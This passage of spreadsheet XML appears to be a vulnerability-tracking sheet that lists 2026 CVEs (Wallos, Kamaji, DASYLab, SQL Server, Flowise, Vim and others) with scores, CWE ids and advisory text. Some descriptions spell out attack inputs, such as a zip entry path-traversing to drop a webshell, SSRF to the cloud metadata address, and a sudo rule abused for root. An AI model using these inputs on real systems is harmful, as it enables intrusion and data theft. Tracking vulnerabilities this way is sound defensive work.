      <c r="G1517" s="5" t="inlineStr"/>
      <c r="H1517" s="5" t="inlineStr"/>
      <c r="I1517" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1517" s="5" t="inlineStr"/>
      <c r="K1517" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1517" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, POST /endpoints/db/restore.php calls ZipArchive::extractTo() without validating entry names for ../ sequences. Admin uploads crafted zip with entry logos/../../endpoints/shell.php to write webshell to webroot. Extension filter only applies to post-extraction logo copy step. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61639</t>
        </is>
      </c>
    </row>
    <row r="1518">
      <c r="A1518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61640</t>
        </is>
      </c>
      <c r="C1518" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1518" s="5" t="inlineStr"/>
      <c r="F1518" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1518" s="5" t="inlineStr"/>
      <c r="H1518" s="5" t="inlineStr"/>
      <c r="I1518" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1518" s="5" t="inlineStr"/>
      <c r="K1518" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1518" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, Admin-configured OIDC token_url and user_info_url in includes/oidc/handle_oidc_callback.php:18-49 are used directly in curl_init() with zero SSRF filtering. Unlike logo/webhook URLs which have validate_webhook_url_for_ssrf(), OIDC URLs bypass all protections. Admin sets URL to http://169.254.169.254/latest/meta-data/ for cloud metadata access or internal network pivoting. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61640</t>
        </is>
      </c>
    </row>
    <row r="1519">
      <c r="A1519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62246</t>
        </is>
      </c>
      <c r="C1519" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1519" s="5" t="inlineStr"/>
      <c r="F1519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1519" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1519" s="5" t="inlineStr"/>
      <c r="I1519" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1519" s="5" t="inlineStr"/>
      <c r="K1519" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-653</t>
        </is>
      </c>
      <c r="L1519" s="5" t="inlineStr">
        <is>
          <t>Kamaji is the Hosted Control Plane Manager for Kubernetes. Prior to 26.7.4-edge, Kamaji derives a TenantControlPlane datastore schema, database user, and etcd key prefix from a lossy namespace-and-name normalization in GetDefaultDatastoreSchema() and GetDefaultDatastoreUsername(), allowing distinct tenants with colliding normalized identifiers to share control-plane state and read, modify, or destroy another tenant's Kubernetes data. This issue is fixed in version 26.7.4-edge.</t>
        </is>
      </c>
      <c r="M1519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62246</t>
        </is>
      </c>
    </row>
    <row r="1520">
      <c r="A1520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63425</t>
        </is>
      </c>
      <c r="C1520" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1520" s="5" t="inlineStr"/>
      <c r="F1520" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1520" s="5" t="inlineStr"/>
      <c r="H1520" s="5" t="inlineStr">
        <is>
          <t>lenovo:dock_manager</t>
        </is>
      </c>
      <c r="I1520" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1520" s="5" t="inlineStr"/>
      <c r="K1520" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1520" s="5" t="inlineStr">
        <is>
          <t>During an internal security assessment, a potential improper permissions vulnerability was discovered in Lenovo Dock Manager that could allow a local authenticated user to execute arbitrary code with elevated privileges.</t>
        </is>
      </c>
      <c r="M1520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63425</t>
        </is>
      </c>
    </row>
    <row r="1521">
      <c r="A1521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63427</t>
        </is>
      </c>
      <c r="C1521" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1521" s="5" t="inlineStr"/>
      <c r="F1521" s="5" t="inlineStr"/>
      <c r="G1521" s="5" t="inlineStr"/>
      <c r="H1521" s="5" t="inlineStr"/>
      <c r="I1521" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1521" s="5" t="inlineStr"/>
      <c r="K1521" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1521" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability was discovered in Lenovo Software Fix that could allow a local authenticated user to perform arbitrary code execution with elevated privileges.</t>
        </is>
      </c>
      <c r="M1521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63427</t>
        </is>
      </c>
    </row>
    <row r="1522">
      <c r="A1522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64195</t>
        </is>
      </c>
      <c r="C1522" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1522" s="5" t="inlineStr"/>
      <c r="F1522" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1522" s="5" t="inlineStr"/>
      <c r="H1522" s="5" t="inlineStr"/>
      <c r="I1522" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1522" s="5" t="inlineStr"/>
      <c r="K1522" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1522" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to lack of proper validation of user-supplied data. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64195</t>
        </is>
      </c>
    </row>
    <row r="1523">
      <c r="A1523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64196</t>
        </is>
      </c>
      <c r="C1523" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1523" s="5" t="inlineStr"/>
      <c r="F1523" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1523" s="5" t="inlineStr"/>
      <c r="H1523" s="5" t="inlineStr"/>
      <c r="I1523" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1523" s="5" t="inlineStr"/>
      <c r="K1523" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1523" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to improper validation of user-supplied data, resulting in a write past the end of an allocated heap. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64196</t>
        </is>
      </c>
    </row>
    <row r="1524">
      <c r="A1524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64197</t>
        </is>
      </c>
      <c r="C1524" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1524" s="5" t="inlineStr"/>
      <c r="F1524" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1524" s="5" t="inlineStr"/>
      <c r="H1524" s="5" t="inlineStr"/>
      <c r="I1524" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1524" s="5" t="inlineStr"/>
      <c r="K1524" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1524" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to improper validation of user-supplied data, resulting in a write past the end of an allocated data structure. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64197</t>
        </is>
      </c>
    </row>
    <row r="1525">
      <c r="A1525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64198</t>
        </is>
      </c>
      <c r="C1525" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1525" s="5" t="inlineStr"/>
      <c r="F1525" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1525" s="5" t="inlineStr"/>
      <c r="H1525" s="5" t="inlineStr"/>
      <c r="I1525" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1525" s="5" t="inlineStr"/>
      <c r="K1525" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1525" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read a few bytes past the end of an allocated heap buffer during file handling.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64198</t>
        </is>
      </c>
    </row>
    <row r="1526">
      <c r="A1526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64200</t>
        </is>
      </c>
      <c r="C1526" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1526" s="5" t="inlineStr"/>
      <c r="F1526" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1526" s="5" t="inlineStr"/>
      <c r="H1526" s="5" t="inlineStr"/>
      <c r="I1526" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1526" s="5" t="inlineStr"/>
      <c r="K1526" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1526" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read a past the end of an allocated heap buffer during string conversion.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64200</t>
        </is>
      </c>
    </row>
    <row r="1527">
      <c r="A1527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64851</t>
        </is>
      </c>
      <c r="C1527" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1527" s="5" t="inlineStr"/>
      <c r="F1527" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1527" s="5" t="inlineStr"/>
      <c r="H1527" s="5" t="inlineStr"/>
      <c r="I1527" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1527" s="5" t="inlineStr"/>
      <c r="K1527" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1527" s="5" t="inlineStr">
        <is>
          <t>Grav Shortcode Core Plugin allows for the development shortcode plugins that utilize the common format utilized by WordPress and BBCode. Prior to 6.2.2, Grav Shortcode Core passes shortcode syntax through Security::detectXss() because it contains no literal less-than character, then ColorShortcode.php and related attribute handlers concatenate an attacker-controlled parameter into HTML without encoding. An account with admin.pages permission can close the generated attribute and add an event handler, creating stored cross-site scripting that executes for visitors or administrators who view the page. This issue is fixed in version 6.2.2.</t>
        </is>
      </c>
      <c r="M1527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64851</t>
        </is>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65986</t>
        </is>
      </c>
      <c r="C1528" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1528" s="5" t="inlineStr"/>
      <c r="F1528" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1528" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1528" s="5" t="inlineStr"/>
      <c r="I1528" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1528" s="5" t="inlineStr"/>
      <c r="K1528" s="5" t="inlineStr">
        <is>
          <t>CWE-434, CWE-79</t>
        </is>
      </c>
      <c r="L1528" s="5" t="inlineStr">
        <is>
          <t>CVAT is an open source interactive video and image annotation tool for computer vision. Versions 2.5.0 through 2.66.0 contain a XSS vulnerability that can be accessed through annotation guide assets. When CVAT serves the files attached to an annotation guide, it labels them with a media type ( Content-Type ) that the attacker can influence, so instead of treating an uploaded file as plain data, the victim's browser can be told to treat it as an HTML page and run any JavaScript inside it. This issue has been fixed in version 2.67.0.</t>
        </is>
      </c>
      <c r="M1528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65986</t>
        </is>
      </c>
    </row>
    <row r="1529">
      <c r="A1529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="C1529" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1529" s="5" t="inlineStr"/>
      <c r="F1529" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1529" s="5" t="inlineStr"/>
      <c r="H1529" s="5" t="inlineStr"/>
      <c r="I1529" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1529" s="5" t="inlineStr"/>
      <c r="K1529" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1529" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="1530">
      <c r="A1530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="C1530" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1530" s="5" t="inlineStr"/>
      <c r="F1530" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1530" s="5" t="inlineStr"/>
      <c r="H1530" s="5" t="inlineStr"/>
      <c r="I1530" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1530" s="5" t="inlineStr"/>
      <c r="K1530" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1530" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="1531">
      <c r="A1531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67397</t>
        </is>
      </c>
      <c r="C1531" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1531" s="5" t="inlineStr"/>
      <c r="F1531" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1531" s="5" t="inlineStr"/>
      <c r="H1531" s="5" t="inlineStr"/>
      <c r="I1531" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1531" s="5" t="inlineStr"/>
      <c r="K1531" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1531" s="5" t="inlineStr">
        <is>
          <t>Path traversal in Plesk 18.0.79.9 and earlier and 18.0.80 through 18.0.80.5 allows local users to execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M1531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67397</t>
        </is>
      </c>
    </row>
    <row r="1532">
      <c r="A1532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67609</t>
        </is>
      </c>
      <c r="C1532" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1532" s="5" t="inlineStr"/>
      <c r="F1532" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1532" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1532" s="5" t="inlineStr"/>
      <c r="I1532" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1532" s="5" t="inlineStr"/>
      <c r="K1532" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1532" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain a privilege escalation vulnerability that allows attackers with access to the apache account to execute arbitrary commands as root by exploiting an insecure sudoers configuration in /etc/sudoers.d/telenia. The configuration grants the apache user NOPASSWD execution of /bin/nice, which can be leveraged to invoke arbitrary commands, enabling full root-level command execution without supplying a password.</t>
        </is>
      </c>
      <c r="M1532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67609</t>
        </is>
      </c>
    </row>
    <row r="1533">
      <c r="A1533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="C1533" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1533" s="5" t="inlineStr"/>
      <c r="F1533" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1533" s="5" t="inlineStr"/>
      <c r="H1533" s="5" t="inlineStr"/>
      <c r="I1533" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1533" s="5" t="inlineStr"/>
      <c r="K1533" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1533" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="1534">
      <c r="A1534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68558</t>
        </is>
      </c>
      <c r="C1534" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1534" s="5" t="inlineStr"/>
      <c r="F1534" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1534" s="5" t="inlineStr"/>
      <c r="H1534" s="5" t="inlineStr"/>
      <c r="I1534" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1534" s="5" t="inlineStr"/>
      <c r="K1534" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1534" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. From 8.36 until 9.74, the outgoing webhook Integration URL validator in models/integrations.js checked only the literal URL.hostname against regular expressions, so DNS names such as 169-254-169-254.nip.io passed that first-line check. The delivery path's fetchSafe guard already blocked the reported IPv4 destination, but its separate IPv4-only resolver and duplicated blocklist created inconsistent all-address-family enforcement and drift risk between input-time and connection-time validation. Version 9.74 makes server/lib/ssrfGuard.js resolve all addresses with `dns.lookup({ all: true })`, validate every result through the shared isIpBlocked logic, pin the connection, and block redirects. This issue is fixed in version 9.74.</t>
        </is>
      </c>
      <c r="M1534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68558</t>
        </is>
      </c>
    </row>
    <row r="1535">
      <c r="A1535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69250</t>
        </is>
      </c>
      <c r="C1535" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1535" s="5" t="inlineStr"/>
      <c r="F1535" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1535" s="5" t="inlineStr"/>
      <c r="H1535" s="5" t="inlineStr"/>
      <c r="I1535" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1535" s="5" t="inlineStr"/>
      <c r="K1535" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1535" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the OAuth2 token refresh endpoint POST /api/v1/oauth2-credential/refresh/:credentialId is unauthenticated by design and performs a server-side HTTP request to the credential-controlled accessTokenUrl without SSRF protections. Runtime validation confirmed that the endpoint was reachable without authentication, triggered outbound POST requests to an attacker-controlled server, reflected the full remote response body to the caller through tokenInfo, and sent client_id, client_secret, grant_type=refresh_token, and refresh_token in the request body. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M1535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69250</t>
        </is>
      </c>
    </row>
    <row r="1536">
      <c r="A1536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6958</t>
        </is>
      </c>
      <c r="C1536" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1536" s="5" t="inlineStr"/>
      <c r="F1536" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1536" s="5" t="inlineStr">
        <is>
          <t>windows, openssl</t>
        </is>
      </c>
      <c r="H1536" s="5" t="inlineStr"/>
      <c r="I1536" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1536" s="5" t="inlineStr"/>
      <c r="K1536" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1536" s="5" t="inlineStr">
        <is>
          <t>Acunetix 25.11.251107123 for Windows contains a local privilege escalation vulnerability in the Web Vulnerability Scanning Engine (wvsc.exe) that allows low-privileged local attackers to execute arbitrary code as SYSTEM by exploiting a missing hardcoded directory path for OpenSSL-related files. Attackers can create the missing directory, place a malicious file at the expected path, and cause the SYSTEM-level wvsc.exe process to load and execute it, resulting in full privilege escalation.</t>
        </is>
      </c>
      <c r="M1536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6958</t>
        </is>
      </c>
    </row>
    <row r="1537">
      <c r="A1537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73072</t>
        </is>
      </c>
      <c r="C1537" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1537" s="5" t="inlineStr"/>
      <c r="F1537" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1537" s="5" t="inlineStr"/>
      <c r="H1537" s="5" t="inlineStr"/>
      <c r="I1537" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1537" s="5" t="inlineStr"/>
      <c r="K1537" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L1537" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0846, set_sofo() in src/spellfile.c reuses sl_sal_first[] without resetting values left by set_sal_first(), so a crafted spell file containing an SN_SAL section before an SN_SOFO section causes under-counted mapping lists and attacker-influenced writes beyond a heap allocation. This issue is fixed in version 9.2.0846.</t>
        </is>
      </c>
      <c r="M1537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73072</t>
        </is>
      </c>
    </row>
    <row r="1538">
      <c r="A1538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73079</t>
        </is>
      </c>
      <c r="C1538" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1538" s="5" t="inlineStr"/>
      <c r="F1538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1538" s="5" t="inlineStr"/>
      <c r="H1538" s="5" t="inlineStr"/>
      <c r="I1538" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1538" s="5" t="inlineStr"/>
      <c r="K1538" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-441</t>
        </is>
      </c>
      <c r="L1538" s="5" t="inlineStr">
        <is>
          <t>Sub2API is an AI API gateway platform designed to distribute and manage API quotas from AI product subscriptions. From 0.1.135, to 0.1.168, platform API keys issued to tenants are exchanged for upstream requests made with shared provider accounts (ChatGPT/Codex OAuth, OpenAI platform keys, or an operator-configured base URL) that belong to the operator, not to the caller. The `POST /responses/*subpath` wildcard routes spliced the client-supplied subpath into the upstream URL with no validation. This lets an authenticated tenant relay requests to arbitrary upstream endpoints using pooled account credentials via a path traversal. This vulnerability is fixed in 0.1.169.</t>
        </is>
      </c>
      <c r="M1538" s="6" t="inlineStr">
        <is>
